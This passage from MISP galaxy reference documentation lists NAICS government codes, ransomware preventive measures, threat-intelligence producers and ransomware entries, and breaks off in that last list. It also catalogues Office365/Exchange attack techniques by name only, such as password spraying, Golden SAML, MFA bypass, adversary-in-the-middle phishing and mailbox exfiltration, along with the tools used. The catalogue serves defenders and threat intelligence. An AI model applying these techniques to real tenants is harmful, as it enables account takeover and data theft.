  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92313" with estimative-language:likelihood-probability="likely"

92314

Administration of Veterans' Affairs

The tag is: misp-galaxy:naics="92314"

92314 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="923140" with estimative-language:likelihood-probability="likely"

923140

Administration of Veterans' Affairs

The tag is: misp-galaxy:naics="923140"

923140 has relationships with:

  • child-of: misp-galaxy:naics="9231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92314" with estimative-language:likelihood-probability="likely"

924

Administration of Environmental Quality Programs

The tag is: misp-galaxy:naics="924"

924 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

9241

Administration of Environmental Quality Programs

The tag is: misp-galaxy:naics="9241"

9241 has relationships with:

  • child-of: misp-galaxy:naics="924" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="924110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="924120" with estimative-language:likelihood-probability="likely"

92411

Administration of Air and Water Resource and Solid Waste Management Programs

The tag is: misp-galaxy:naics="92411"

92411 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="924110" with estimative-language:likelihood-probability="likely"

924110

Administration of Air and Water Resource and Solid Waste Management Programs

The tag is: misp-galaxy:naics="924110"

924110 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92411" with estimative-language:likelihood-probability="likely"

92412

Administration of Conservation Programs

The tag is: misp-galaxy:naics="92412"

92412 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="924120" with estimative-language:likelihood-probability="likely"

924120

Administration of Conservation Programs

The tag is: misp-galaxy:naics="924120"

924120 has relationships with:

  • child-of: misp-galaxy:naics="9241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92412" with estimative-language:likelihood-probability="likely"

925

Administration of Housing Programs, Urban Planning, and Community Development

The tag is: misp-galaxy:naics="925"

925 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

9251

Administration of Housing Programs, Urban Planning, and Community Development

The tag is: misp-galaxy:naics="9251"

9251 has relationships with:

  • child-of: misp-galaxy:naics="925" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="925110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="925120" with estimative-language:likelihood-probability="likely"

92511

Administration of Housing Programs

The tag is: misp-galaxy:naics="92511"

92511 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="925110" with estimative-language:likelihood-probability="likely"

925110

Administration of Housing Programs

The tag is: misp-galaxy:naics="925110"

925110 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92511" with estimative-language:likelihood-probability="likely"

92512

Administration of Urban Planning and Community and Rural Development

The tag is: misp-galaxy:naics="92512"

92512 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="925120" with estimative-language:likelihood-probability="likely"

925120

Administration of Urban Planning and Community and Rural Development

The tag is: misp-galaxy:naics="925120"

925120 has relationships with:

  • child-of: misp-galaxy:naics="9251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92512" with estimative-language:likelihood-probability="likely"

926

Administration of Economic Programs

The tag is: misp-galaxy:naics="926"

926 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

9261

Administration of Economic Programs

The tag is: misp-galaxy:naics="9261"

9261 has relationships with:

  • child-of: misp-galaxy:naics="926" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92615" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="926150" with estimative-language:likelihood-probability="likely"

92611

Administration of General Economic Programs

The tag is: misp-galaxy:naics="92611"

92611 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926110" with estimative-language:likelihood-probability="likely"

926110

Administration of General Economic Programs

The tag is: misp-galaxy:naics="926110"

926110 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92611" with estimative-language:likelihood-probability="likely"

92612

Regulation and Administration of Transportation Programs

The tag is: misp-galaxy:naics="92612"

92612 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926120" with estimative-language:likelihood-probability="likely"

926120

Regulation and Administration of Transportation Programs

The tag is: misp-galaxy:naics="926120"

926120 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92612" with estimative-language:likelihood-probability="likely"

92613

Regulation and Administration of Communications, Electric, Gas, and Other Utilities

The tag is: misp-galaxy:naics="92613"

92613 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926130" with estimative-language:likelihood-probability="likely"

926130

Regulation and Administration of Communications, Electric, Gas, and Other Utilities

The tag is: misp-galaxy:naics="926130"

926130 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92613" with estimative-language:likelihood-probability="likely"

92614

Regulation of Agricultural Marketing and Commodities

The tag is: misp-galaxy:naics="92614"

92614 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926140" with estimative-language:likelihood-probability="likely"

926140

Regulation of Agricultural Marketing and Commodities

The tag is: misp-galaxy:naics="926140"

926140 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92614" with estimative-language:likelihood-probability="likely"

92615

Regulation, Licensing, and Inspection of Miscellaneous Commercial Sectors

The tag is: misp-galaxy:naics="92615"

92615 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="926150" with estimative-language:likelihood-probability="likely"

926150

Regulation, Licensing, and Inspection of Miscellaneous Commercial Sectors

The tag is: misp-galaxy:naics="926150"

926150 has relationships with:

  • child-of: misp-galaxy:naics="9261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92615" with estimative-language:likelihood-probability="likely"

927

Space Research and Technology

The tag is: misp-galaxy:naics="927"

927 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9271" with estimative-language:likelihood-probability="likely"

9271

Space Research and Technology

The tag is: misp-galaxy:naics="9271"

9271 has relationships with:

  • child-of: misp-galaxy:naics="927" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="927110" with estimative-language:likelihood-probability="likely"

92711

Space Research and Technology

The tag is: misp-galaxy:naics="92711"

92711 has relationships with:

  • child-of: misp-galaxy:naics="9271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="927110" with estimative-language:likelihood-probability="likely"

927110

Space Research and Technology

The tag is: misp-galaxy:naics="927110"

927110 has relationships with:

  • child-of: misp-galaxy:naics="9271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92711" with estimative-language:likelihood-probability="likely"

928

National Security and International Affairs

The tag is: misp-galaxy:naics="928"

928 has relationships with:

  • child-of: misp-galaxy:naics="92" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

9281

National Security and International Affairs

The tag is: misp-galaxy:naics="9281"

9281 has relationships with:

  • child-of: misp-galaxy:naics="928" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="928110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="92812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="928120" with estimative-language:likelihood-probability="likely"

92811

National Security

The tag is: misp-galaxy:naics="92811"

92811 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="928110" with estimative-language:likelihood-probability="likely"

928110

National Security

The tag is: misp-galaxy:naics="928110"

928110 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92811" with estimative-language:likelihood-probability="likely"

92812

International Affairs

The tag is: misp-galaxy:naics="92812"

92812 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="928120" with estimative-language:likelihood-probability="likely"

928120

International Affairs

The tag is: misp-galaxy:naics="928120"

928120 has relationships with:

  • child-of: misp-galaxy:naics="9281" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="92812" with estimative-language:likelihood-probability="likely"

o365-exchange-techniques

o365-exchange-techniques - Office365/Exchange related techniques by @johnLaTwC and @inversecos.

o365-exchange-techniques is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

John Lambert - Alexandre Dulaunoy - Lina Lau - Thomas Patzke

AAD - Dump users and groups with Azure AD

AAD - Dump users and groups with Azure AD

The tag is: misp-galaxy:cloud-security="AAD - Dump users and groups with Azure AD"

AAD - PowerShell

AAD - PowerShell

The tag is: misp-galaxy:cloud-security="AAD - PowerShell"

AAD - Enumerate Domains

AAD - Enumerate Domains

The tag is: misp-galaxy:cloud-security="AAD - Enumerate Domains"

AAD - Enumerate Users

AAD - Enumerate Users

The tag is: misp-galaxy:cloud-security="AAD - Enumerate Users"

O365 - Get Global Address List: MailSniper

O365 - Get Global Address List: MailSniper

The tag is: misp-galaxy:cloud-security="O365 - Get Global Address List: MailSniper"

O365 - Find Open Mailboxes: MailSniper

O365 - Find Open Mailboxes: MailSniper

The tag is: misp-galaxy:cloud-security="O365 - Find Open Mailboxes: MailSniper"

O365 - User account enumeration with ActiveSync

O365 - User account enumeration with ActiveSync

The tag is: misp-galaxy:cloud-security="O365 - User account enumeration with ActiveSync"

End Point - Search host for Azure Credentials: SharpCloud

End Point - Search host for Azure Credentials: SharpCloud

The tag is: misp-galaxy:cloud-security="End Point - Search host for Azure Credentials: SharpCloud"

On-Prem Exchange - Portal Recon

On-Prem Exchange - Portal Recon

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Portal Recon"

On-Prem Exchange - Enumerate domain accounts: using Skype4B

On-Prem Exchange - Enumerate domain accounts: using Skype4B

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: using Skype4B"

On-Prem Exchange - Enumerate domain accounts: OWA & Exchange

On-Prem Exchange - Enumerate domain accounts: OWA & Exchange

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: OWA & Exchange"

On-Prem Exchange - Enumerate domain accounts: FindPeople

On-Prem Exchange - Enumerate domain accounts: FindPeople

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Enumerate domain accounts: FindPeople"

On-Prem Exchange - OWA version discovery

On-Prem Exchange - OWA version discovery

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - OWA version discovery"

Bruteforce via OWA

Bruteforce via OWA

The tag is: misp-galaxy:cloud-security="Bruteforce via OWA"

Bruteforce EWS

Bruteforce EWS

The tag is: misp-galaxy:cloud-security="Bruteforce EWS"

Bruteforce OAuth

Bruteforce OAuth

The tag is: misp-galaxy:cloud-security="Bruteforce OAuth"

Bruteforce via AAD Sign in Form

Bruteforce via AAD Sign in Form

The tag is: misp-galaxy:cloud-security="Bruteforce via AAD Sign in Form"

Bruteforce through Autologon API

Bruteforce through Autologon API

The tag is: misp-galaxy:cloud-security="Bruteforce through Autologon API"

AAD - Password Spray: MailSniper

AAD - Password Spray: MailSniper

The tag is: misp-galaxy:cloud-security="AAD - Password Spray: MailSniper"

AAD - Password Spray: CredKing

AAD - Password Spray: CredKing

The tag is: misp-galaxy:cloud-security="AAD - Password Spray: CredKing"

O365 - Bruteforce of Autodiscover: SensePost Ruler

O365 - Bruteforce of Autodiscover: SensePost Ruler

The tag is: misp-galaxy:cloud-security="O365 - Bruteforce of Autodiscover: SensePost Ruler"

O365 - Phishing for credentials

O365 - Phishing for credentials

The tag is: misp-galaxy:cloud-security="O365 - Phishing for credentials"

O365 - Phishing using OAuth app

O365 - Phishing using OAuth app

The tag is: misp-galaxy:cloud-security="O365 - Phishing using OAuth app"

O365 - 2FA MITM Phishing: evilginx2

O365 - 2FA MITM Phishing: evilginx2

The tag is: misp-galaxy:cloud-security="O365 - 2FA MITM Phishing: evilginx2"

O365 - MFA Bypass via IMAP/POP

O365 - MFA Bypass via IMAP/POP

The tag is: misp-galaxy:cloud-security="O365 - MFA Bypass via IMAP/POP"

Compromising Pass-Through Authentication

Compromising Pass-Through Authentication

The tag is: misp-galaxy:cloud-security="Compromising Pass-Through Authentication"

Enumerate Users, Admins, Roles and Permissions

Enumerate Users, Admins, Roles and Permissions

The tag is: misp-galaxy:cloud-security="Enumerate Users, Admins, Roles and Permissions"

Enumerate MFA Settings

Enumerate MFA Settings

The tag is: misp-galaxy:cloud-security="Enumerate MFA Settings"

Golden SAML

Golden SAML

The tag is: misp-galaxy:cloud-security="Golden SAML"

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Password Spray using Invoke-PasswordSprayOWA, EWS"

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Bruteforce of Autodiscover: SensePost Ruler"

Change MFA Settings

Change MFA Settings

The tag is: misp-galaxy:cloud-security="Change MFA Settings"

Change Conditional Access Settings

Change Conditional Access Settings

The tag is: misp-galaxy:cloud-security="Change Conditional Access Settings"

Malicious App Registrations

Malicious App Registrations

The tag is: misp-galaxy:cloud-security="Malicious App Registrations"

Add Service Principal or App Credentials

Add Service Principal or App Credentials

The tag is: misp-galaxy:cloud-security="Add Service Principal or App Credentials"

Add Service Principal

Add Service Principal

The tag is: misp-galaxy:cloud-security="Add Service Principal"

Add Federation Trust

Add Federation Trust

The tag is: misp-galaxy:cloud-security="Add Federation Trust"

O365 - Add Mail forwarding rule

O365 - Add Mail forwarding rule

The tag is: misp-galaxy:cloud-security="O365 - Add Mail forwarding rule"

Add Global admin account

Add Global admin account

The tag is: misp-galaxy:cloud-security="Add Global admin account"

Add user account

Add user account

The tag is: misp-galaxy:cloud-security="Add user account"

O365 - Delegate Tenant Admin

O365 - Delegate Tenant Admin

The tag is: misp-galaxy:cloud-security="O365 - Delegate Tenant Admin"

End Point - Persistence throught Outlook Home Page: SensePost Ruler

End Point - Persistence throught Outlook Home Page: SensePost Ruler

The tag is: misp-galaxy:cloud-security="End Point - Persistence throught Outlook Home Page: SensePost Ruler"

End Point - Persistence throught custom Outlook form

End Point - Persistence throught custom Outlook form

The tag is: misp-galaxy:cloud-security="End Point - Persistence throught custom Outlook form"

Mailbox Rule Creation

Mailbox Rule Creation

The tag is: misp-galaxy:cloud-security="Mailbox Rule Creation"

Mailbox Folder Permissions

Mailbox Folder Permissions

The tag is: misp-galaxy:cloud-security="Mailbox Folder Permissions"

Mail Flow (Transport Rules)

Mail Flow (Transport Rules)

The tag is: misp-galaxy:cloud-security="Mail Flow (Transport Rules)"

O365 - MailSniper: Search Mailbox for credentials

O365 - MailSniper: Search Mailbox for credentials

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for credentials"

O365 - Search for Content with eDiscovery

O365 - Search for Content with eDiscovery

The tag is: misp-galaxy:cloud-security="O365 - Search for Content with eDiscovery"

O365 - Account Takeover: Add-MailboxPermission

O365 - Account Takeover: Add-MailboxPermission

The tag is: misp-galaxy:cloud-security="O365 - Account Takeover: Add-MailboxPermission"

O365 - Pivot to On-Prem host: SensePost Ruler

O365 - Pivot to On-Prem host: SensePost Ruler

The tag is: misp-galaxy:cloud-security="O365 - Pivot to On-Prem host: SensePost Ruler"

O365 - Exchange Tasks for C2: MWR

O365 - Exchange Tasks for C2: MWR

The tag is: misp-galaxy:cloud-security="O365 - Exchange Tasks for C2: MWR"

O365 - Send Internal Email

O365 - Send Internal Email

The tag is: misp-galaxy:cloud-security="O365 - Send Internal Email"

On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)"

On-Prem Exchange - Delegation

On-Prem Exchange - Delegation

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Delegation"

O365 - MailSniper: Search Mailbox for content

O365 - MailSniper: Search Mailbox for content

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for content"

O365 - Exfiltration email using EWS APIs with PowerShell

O365 - Exfiltration email using EWS APIs with PowerShell

The tag is: misp-galaxy:cloud-security="O365 - Exfiltration email using EWS APIs with PowerShell"

Downgrade License

Downgrade License

The tag is: misp-galaxy:cloud-security="Downgrade License"

Impersonate Users

Impersonate Users

The tag is: misp-galaxy:cloud-security="Impersonate Users"

Assign Administrative Role to Service Principal

Assign Administrative Role to Service Principal

The tag is: misp-galaxy:cloud-security="Assign Administrative Role to Service Principal"

Elevate to User Access Administrator Role

Elevate to User Access Administrator Role

The tag is: misp-galaxy:cloud-security="Elevate to User Access Administrator Role"

eDiscovery Abuse

eDiscovery Abuse

The tag is: misp-galaxy:cloud-security="eDiscovery Abuse"

O365 - Download documents, messages and email

O365 - Download documents, messages and email

The tag is: misp-galaxy:cloud-security="O365 - Download documents, messages and email"

online-service

Known public online services.

online-service is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MISP Project

Notion

Your wiki, docs, & projects. Together. Notion is the connected workspace where better, faster work happens.

The tag is: misp-galaxy:online-service="Notion"

Notion has relationships with:

  • used-by: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

Table 7915. Table References

Links

https://www.notion.so/product

Preventive Measure

Preventive measures based on the ransomware document overview as published in https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#. The preventive measures are quite generic and can fit any standard Windows infrastructure and its security measures.

Preventive Measure is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Backup and Restore Process

Make sure to have adequate backup processes in place and frequently test a restore of these backups. (Schrödinger’s backup: it is both existent and non-existent until you’ve tried a restore.)

The tag is: misp-galaxy:preventive-measure="Backup and Restore Process"

Table 7916. Table References

Links

http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7.

Block Macros

Disable macros in Office files downloaded from the Internet. This can be configured to work in two different modes: A.) Open downloaded documents in 'Protected View' B.) Open downloaded documents and block all macros

The tag is: misp-galaxy:preventive-measure="Block Macros"

Table 7917. Table References

Links

https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6?ui=en-US&rs=en-US&ad=US

https://www.404techsupport.com/2016/04/office2016-macro-group-policy/?utm_source=dlvr.it&utm_medium=twitter

Disable WSH

Disable Windows Script Host

The tag is: misp-galaxy:preventive-measure="Disable WSH"

Table 7918. Table References

Links

http://www.windowsnetworking.com/kbase/WindowsTips/WindowsXP/AdminTips/Customization/DisableWindowsScriptingHostWSH.html

Filter Attachments Level 1

Filter the following attachments on your mail gateway: .ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .exe, .hlp, .ht, .hta, .inf, .ins, .isp, .jar, .job, .js, .jse, .lnk, .mda, .mdb, .mde, .mdz, .msc, .msi, .msp, .mst, .ocx, .pcd, .ps1, .reg, .scr, .sct, .shs, .svg, .url, .vb, .vbe, .vbs, .wbk, .wsc, .ws, .wsf, .wsh, .exe, .pif, .pub

The tag is: misp-galaxy:preventive-measure="Filter Attachments Level 1"

Filter Attachments Level 2

Filter the following attachments on your mail gateway: (Filter expression of Level 1 plus) .doc, .xls, .rtf, .docm, .xlsm, .pptm

The tag is: misp-galaxy:preventive-measure="Filter Attachments Level 2"

Restrict program execution

Block all program executions from the %LocalAppData% and %AppData% folders

The tag is: misp-galaxy:preventive-measure="Restrict program execution"

Table 7919. Table References

Links

http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/

http://www.thirdtier.net/ransomware-prevention-kit/

Show File Extensions

Set the registry key "HideFileExt" to 0 in order to show all file extensions, even for known file types. This helps avoid cloaking tricks that use double extensions (e.g. "not_a_virus.pdf.exe").

The tag is: misp-galaxy:preventive-measure="Show File Extensions"

Table 7920. Table References

Links

http://www.sevenforums.com/tutorials/10570-file-extensions-hide-show.htm

Enforce UAC Prompt

Require administrative users to confirm any action that requires elevated rights

The tag is: misp-galaxy:preventive-measure="Enforce UAC Prompt"

Table 7921. Table References

Links

https://technet.microsoft.com/en-us/library/dd835564(WS.10).aspx

Remove Admin Privileges

Remove and restrict administrative rights whenever possible. Malware can only modify files that users have write access to.

The tag is: misp-galaxy:preventive-measure="Remove Admin Privileges"

Restrict Workstation Communication

Activate the Windows Firewall to restrict workstation to workstation communication

The tag is: misp-galaxy:preventive-measure="Restrict Workstation Communication"

Sandboxing Email Input

Use a sandbox that opens email attachments and removes attachments based on behavior analysis

The tag is: misp-galaxy:preventive-measure="Sandboxing Email Input"

Execution Prevention

Software that allows controlling the execution of processes, sometimes integrated in antivirus software. Free options: AntiHook, ProcessGuard, System Safety Monitor

The tag is: misp-galaxy:preventive-measure="Execution Prevention"

Change Default "Open With" to Notepad

Force extensions primarily used for infections to open up in Notepad rather than Windows Script Host or Internet Explorer

The tag is: misp-galaxy:preventive-measure="Change Default "Open With" to Notepad"

Table 7922. Table References

Links

https://bluesoul.me/2016/05/12/use-gpo-to-change-the-default-behavior-of-potentially-malicious-file-extensions/

File Screening

Server-side file screening with the help of File Server Resource Manager

The tag is: misp-galaxy:preventive-measure="File Screening"

Table 7923. Table References

Links

http://jpelectron.com/sample/Info%20and%20Documents/Stop%20crypto%20badware%20before%20it%20ruins%20your%20day/1-PreventCrypto-Readme.htm

EMET

Detect and block exploitation techniques

The tag is: misp-galaxy:preventive-measure="EMET"

Table 7925. Table References

Links

www.microsoft.com/emet

http://windowsitpro.com/security/control-emet-group-policy

Sysmon

Detect Ransomware in an early stage with new Sysmon 5 File/Registry monitoring

The tag is: misp-galaxy:preventive-measure="Sysmon"

Table 7926. Table References

Links

https://twitter.com/JohnLaTwC/status/799792296883388416

Blacklist-phone-numbers

Filter the numbers at phone routing level including PABX

The tag is: misp-galaxy:preventive-measure="Blacklist-phone-numbers"

Table 7927. Table References

Links

https://wiki.freepbx.org/display/FPG/Blacklist+Module+User+Guide#BlacklistModuleUserGuide-ImportingorExportingaBlacklistinCSVFileFormat

ACL

Restrict access to shares users should not be allowed to write to

The tag is: misp-galaxy:preventive-measure="ACL"

Table 7928. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/secauthz/access-control-lists

Packet filtering

Limit access to a service by network/packet filtering of the access to it

The tag is: misp-galaxy:preventive-measure="Packet filtering"

Table 7929. Table References

Links

https://en.wikipedia.org/wiki/Firewall_(computing)

Producer

List of threat intelligence producers, from security vendors to CERTs, including any producer of intelligence at large.

Producer is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Intel471

Intel 471 provides adversary and malware intelligence for leading security teams. Our adversary intelligence is focused on infiltrating access to closed sources where threat actors collaborate, communicate and plan cyber attacks. Our malware intelligence leverages our adversary intelligence and underground capabilities to provide timely data and context on malicious infrastructure.

The tag is: misp-galaxy:producer="Intel471"

Intel471 is also known as:

  • Intel 471 Inc.

  • Intel 471

Table 7930. Table References

Links

https://www.applytosupply.digitalmarketplace.service.gov.uk/g-cloud/services/448869643798857

Sophos

Sophos Ltd. is a British-based security software and hardware company. It was listed on the London Stock Exchange until it was acquired by Thoma Bravo in February 2020.

The tag is: misp-galaxy:producer="Sophos"

Sophos is also known as:

  • Sophos LTD

Table 7931. Table References

Links

https://www.sophos.com/en-us/legal

Group-IB

Group-IB is a creator of cybersecurity technologies to investigate, prevent and fight digital crime.

The tag is: misp-galaxy:producer="Group-IB"

Table 7932. Table References

Links

https://www.group-ib.com/about-us/

Mandiant

Mandiant is an American cybersecurity firm and a subsidiary of Google.

The tag is: misp-galaxy:producer="Mandiant"

Table 7933. Table References

Links

https://en.wikipedia.org/wiki/Mandiant

Spycloud

Threat intelligence provider focusing on data leaks

The tag is: misp-galaxy:producer="Spycloud"

Domaintools

DomainTools is a leading provider of Whois and other DNS profile data for threat intelligence enrichment.

The tag is: misp-galaxy:producer="Domaintools"

Table 7934. Table References

Links

https://icannwiki.org/DomainTools

Feedly

Feedly is an AI-powered news aggregator application for various web browsers and mobile devices running iOS and Android. It is also available as a cloud-based service.

The tag is: misp-galaxy:producer="Feedly"

Table 7935. Table References

Links

https://en.wikipedia.org/wiki/Feedly

Networksdb.io

Database of public networks, IP addresses and domain names owned by companies and organisations worldwide.

The tag is: misp-galaxy:producer="Networksdb.io"

Table 7936. Table References

Links

https://twitter.com/networksdbio

Censys

Company providing a comprehensive dataset of internet intelligence

The tag is: misp-galaxy:producer="Censys"

DomainIQ

DomainIQ is an internet research tool providing information about a domain name, its owner, the server it’s hosted on, its ownership history, similar domains and more.

The tag is: misp-galaxy:producer="DomainIQ"

Arctic

Computer and Network Security

The tag is: misp-galaxy:producer="Arctic"

Arctic is also known as:

  • Arctic Security

Bitsight

BitSight is a cybersecurity ratings company that analyzes companies, government agencies, and educational institutions.

The tag is: misp-galaxy:producer="Bitsight"

RiskIQ

RiskIQ, Inc. is a cyber security company that was based in San Francisco, California. It provided cloud-based software as a service (SaaS) for organizations to detect phishing, fraud, malware, and other online security threats. RiskIQ was acquired by Microsoft in July 2021.

The tag is: misp-galaxy:producer="RiskIQ"

Table 7937. Table References

Links

https://en.wikipedia.org/wiki/RiskIQ

Sweepatic

Sweepatic is a cybersecurity company

The tag is: misp-galaxy:producer="Sweepatic"

Team Cymru

Team Cymru is an internet security firm that offers research services making the internet a more secure place.

The tag is: misp-galaxy:producer="Team Cymru"

Ransomware

Ransomware is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

Nhtnwcuf Ransomware (Fake)

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Nhtnwcuf Ransomware (Fake)"

Table 7938. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/nhtnwcuf-ransomware.html

CryptoJacky Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="CryptoJacky Ransomware"

Table 7939. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/cryptojacky-ransomware.html

https://twitter.com/jiriatvirlab/status/838779371750031360

Kaenlupuf Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Kaenlupuf Ransomware"

Table 7940. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/kaenlupuf-ransomware.html

EnjeyCrypter Ransomware

